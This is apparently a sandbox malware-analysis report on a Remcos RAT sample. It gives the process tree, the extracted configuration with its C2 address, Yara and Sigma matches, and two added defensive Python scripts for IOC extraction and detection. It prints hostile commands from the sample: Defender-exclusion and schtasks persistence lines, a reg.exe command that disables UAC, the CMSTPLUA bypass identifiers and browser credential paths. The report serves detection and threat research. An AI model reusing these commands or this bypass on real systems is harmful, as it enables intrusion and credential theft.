
Windows Analysis Report
HUED23EDE5UGRFQ.exe

Overview

General Information

Sample name: HUED23EDE5UGRFQ.exe
Analysis ID: 1465543
MD5: ea0d00b95a91c801893b5526347170bb
SHA1: 26d81494eb3c0fd67a6037dbd68e3bf8c7677d0d
SHA256: 6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c
Tags: exe, RAT, RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • HUED23EDE5UGRFQ.exe (PID: 2820 cmdline: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe" MD5: EA0D00B95A91C801893B5526347170BB)
    • powershell.exe (PID: 1292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4948 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 2544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 1048 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HUED23EDE5UGRFQ.exe (PID: 4896 cmdline: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe" MD5: EA0D00B95A91C801893B5526347170BB)
  • jdSldfVS.exe (PID: 6124 cmdline: C:\Users\user\AppData\Roaming\jdSldfVS.exe MD5: EA0D00B95A91C801893B5526347170BB)
    • schtasks.exe (PID: 3248 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jdSldfVS.exe (PID: 3580 cmdline: "C:\Users\user\AppData\Roaming\jdSldfVS.exe" MD5: EA0D00B95A91C801893B5526347170BB)
    • jdSldfVS.exe (PID: 4092 cmdline: "C:\Users\user\AppData\Roaming\jdSldfVS.exe" MD5: EA0D00B95A91C801893B5526347170BB)
    • jdSldfVS.exe (PID: 6996 cmdline: "C:\Users\user\AppData\Roaming\jdSldfVS.exe" MD5: EA0D00B95A91C801893B5526347170BB)
  • cleanup
Malware family
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Malware configuration (extracted):
{"Host:Port:Password": "94.156.69.93:2973:0", "Assigned name": "REVOLT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HKC0PV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
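The configuration above is the most reusable artefact in the report: the C2 endpoint, mutex and keylog file name are all directly pivotable. The following is an added example (not Joe Sandbox output and not Remcos code) that normalises that JSON into an IOC set. The config text is copied from the report; the C2 record, the WEB_PORTS set and the function names are this example's own. One assumption is labelled in the code: the "Host:Port:Password" field is treated as possibly holding several endpoints separated by "|", a layout seen in other Remcos configs, although this sample has only one.

```python
"""Normalise the extracted Remcos configuration into an IOC set (added example)."""
from __future__ import annotations
import json
from dataclasses import dataclass, asdict
from ipaddress import ip_address

# Copied verbatim from the sandbox report's configuration extractor output.
CONFIG_JSON = r'''{"Host:Port:Password": "94.156.69.93:2973:0", "Assigned name": "REVOLT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HKC0PV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}'''

WEB_PORTS = {80, 443, 8080, 8443}


@dataclass(frozen=True)
class C2:
    host: str
    port: int
    password: str
    is_ip: bool        # literal IP: the implant needs no DNS lookup, matching the "no DNS query" traffic note
    nonstandard: bool  # port outside the usual web set (2973 here)


def parse_c2(field: str) -> list[C2]:
    """Split 'host:port:password' into C2 records.

    Assumption (not shown by this sample): several endpoints may be joined with '|'.
    Hostnames and IPv4 literals contain no ':', so rsplit from the right is safe.
    """
    out: list[C2] = []
    for entry in field.split("|"):
        entry = entry.strip()
        if not entry:
            continue
        host, port_s, password = entry.rsplit(":", 2)
        port = int(port_s)
        if not 0 < port < 65536:
            raise ValueError(f"bad port in C2 entry {entry!r}")
        try:
            ip_address(host)
            is_ip = True
        except ValueError:
            is_ip = False
        out.append(C2(host, port, password, is_ip, port not in WEB_PORTS))
    return out


def extract_iocs(config: dict) -> dict:
    """Pick out the settings an analyst would pivot on or hunt for on disk."""
    c2 = parse_c2(config["Host:Port:Password"])
    return {
        "campaign": config.get("Assigned name"),
        "c2": [asdict(c) for c in c2],
        "mutex": config.get("Mutex"),
        # Keylogging is on ("1"); the file name is what to look for under the keylog path.
        "keylog_file": config.get("Keylog file") if config.get("Keylog flag") == "1" else None,
        "keylog_encrypted": config.get("Keylog crypt") == "Enable",
        "copy_file": config.get("Copy file"),
        # Remcos' own copy-and-persist routine; "Disable" here means the loader must persist itself.
        "self_install": config.get("Install flag") == "Enable",
        "run_keys": [k.split()[1] for k in ("Setup HKCU\\Run", "Setup HKLM\\Run")
                     if config.get(k) == "Enable"],
    }


def iocs_from_json(text: str) -> dict:
    return extract_iocs(json.loads(text))


if __name__ == "__main__":
    print(json.dumps(iocs_from_json(CONFIG_JSON), indent=2))
```

Note that "Install flag" is Disable, so Remcos' own installer is switched off; the scheduled task in the process tree is registered by the outer executable (HUED23EDE5UGRFQ.exe and its copy jdSldfVS.exe), which the report flags as a .NET unpacker. The keylog file name "logs.dat" matches the dropped file C:\ProgramData\remcos\logs.dat that the Yara rule hit.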
Yara matches (dropped files)
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Yara matches (memory dumps)
Source | Rule | Description | Author
00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
(20 further entries not shown)

Yara matches (unpacked PEs)
Source | Rule | Description | Author
17.2.jdSldfVS.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
17.2.jdSldfVS.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
17.2.jdSldfVS.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
17.2.jdSldfVS.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  Strings:
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
17.2.jdSldfVS.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  Strings:
  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6637c:$s1: CoGetObject
  • 0x66390:$s1: CoGetObject
  • 0x663ac:$s1: CoGetObject
  • 0x70338:$s1: CoGetObject
  • 0x6633c:$s2: Elevation:Administrator!new:
(41 further entries not shown)

                  System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ProcessId: 1292, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ProcessId: 1292, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jdSldfVS.exe, ParentImage: C:\Users\user\AppData\Roaming\jdSldfVS.exe, ParentProcessId: 6124, ParentProcessName: jdSldfVS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp", ProcessId: 3248, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", ProcessId: 1048, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ProcessId: 1292, ProcessName: powershell.exe
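The Sigma hits above (Powershell Defender Exclusion, Base64 Encoded MpPreference Cmdlet, Scheduled temp file as task from temp location, Suspicious Add Scheduled Task Parent, Suspicious Schtasks From Env Var Folder) reduce to a few predicates over process-creation events: which image ran, what its command line contains, and where its parent lives. The following is an added example, not Joe Sandbox or Sigma code, that runs those predicates over constructed records mirroring the process tree in this report. ProcEvent, Finding, the rule names and the two benign control events are this example's own. A third rule covers the CMSTPLUA capability the Yara matches found (the {3E5FC7F9-...} CLSID and the Elevation:Administrator!new: moniker): when that bypass fires, the elevated child is spawned by the COM surrogate dllhost.exe with /Processid:{CLSID} on its command line, which is the shape the hypothetical fifth event below takes; no such event occurred in the sandbox run itself.

```python
"""Process-creation detections for the behaviours in this report (added example)."""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:            # minimal Sysmon EID 1 / 4688-style record (example schema)
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str
    parent_cmdline: str = ""


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(desktop|downloads|appdata)\\", re.I)
TEMP_DIR = re.compile(r"\\(appdata\\local\\temp|windows\\temp)\\", re.I)
MP_EXCLUSION = re.compile(r"\b(add|set)-mppreference\b.*?-exclusion(path|process|extension)\b", re.I)
EXCLUSION_ARG = re.compile(r'-exclusion\w+\s+"?([^"\s]+)', re.I)
SCHTASKS_CREATE = re.compile(r"\bschtasks(\.exe)?\b.*?/create\b", re.I)
SCHTASKS_XML = re.compile(r'/xml\s+"?([^"\s]+)', re.I)
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"   # CLSID from the Yara strings above


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[Finding]:
    findings: list[Finding] = []
    for ev in events:
        image = _basename(ev.image)
        parent = _basename(ev.parent_image)
        # Rule 1: Defender exclusion added from PowerShell (any Exclusion* parameter).
        if image in ("powershell.exe", "pwsh.exe") and MP_EXCLUSION.search(ev.cmdline):
            paths = EXCLUSION_ARG.findall(ev.cmdline)
            findings.append(Finding(ev.pid, "defender_exclusion_added",
                                    f"parent={parent} exclusion={','.join(paths)}"))
        # Rule 2: task registered from an XML in a temp folder, or by a parent in a user-writable path.
        if image == "schtasks.exe" and SCHTASKS_CREATE.search(ev.cmdline):
            m = SCHTASKS_XML.search(ev.cmdline)
            xml_path = m.group(1) if m else ""
            if TEMP_DIR.search(xml_path) or USER_WRITABLE.search(ev.parent_image):
                findings.append(Finding(ev.pid, "schtasks_create_from_temp",
                                        f"parent={parent} xml={xml_path}"))
        # Rule 3: child of the CMSTPLUA COM surrogate (the auto-elevated host of the UAC bypass).
        if parent == "dllhost.exe" and CMSTPLUA_CLSID.lower() in ev.parent_cmdline.lower():
            findings.append(Finding(ev.pid, "cmstplua_elevated_child",
                                    f"child={image} via CMSTPLUA COM host"))
    return findings


# Constructed records: PIDs, paths and command lines as in the report's process tree,
# two benign controls (5000, 5001), and one hypothetical CMSTPLUA-elevated child (5002).
SAMPLE_EVENTS = [
    ProcEvent(1292, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
              r'-ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"',
              2820, r"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"),
    ProcEvent(1048, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"',
              2820, r"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"),
    ProcEvent(5000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-MpPreference", 900, r"C:\Windows\explorer.exe"),
    ProcEvent(5001, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "Vendor\Updater" /XML "C:\ProgramData\Vendor\task.xml"',
              901, r"C:\Program Files\Vendor\setup.exe"),
    ProcEvent(5002, r"C:\Windows\System32\cmd.exe", "cmd.exe /k reg.exe ADD ...",
              902, r"C:\Windows\System32\dllhost.exe",
              r"C:\Windows\System32\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid={f.pid} {f.rule}: {f.detail}")
```

The two control events show the false-positive boundary: reading Defender settings with Get-MpPreference and an installer registering a task from ProgramData do not fire. The sandbox's own hits, a user-Desktop executable adding itself as an exclusion and registering a task from %TEMP%, fire on both rules.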

                  Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", ProcessId: 1048, ProcessName: schtasks.exe

                  Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ProcessId: 4896, TargetFilename: C:\ProgramData\remcos\logs.dat

Snort IDS alerts
Timestamp: 07/01/24-19:44:18.352759; SID: 2032777; Source Port: 2973; Destination Port: 49712; Protocol: TCP; Classtype: A Network Trojan was detected
Timestamp: 07/01/24-19:41:59.286996; SID: 2032776; Source Port: 49712; Destination Port: 2973; Protocol: TCP; Classtype: A Network Trojan was detected


                  AV Detection

Source: HUED23EDE5UGRFQ.exe; Avira: detected
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Avira: detection malicious, Label: HEUR/AGEN.1308776
Source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": "94.156.69.93:2973:0", "Assigned name": "REVOLT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HKC0PV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; ReversingLabs: Detection: 31%
Source: HUED23EDE5UGRFQ.exe; ReversingLabs: Detection: 31%
Source: Yara match; File source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 4896, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Joe Sandbox ML: detected
Source: HUED23EDE5UGRFQ.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
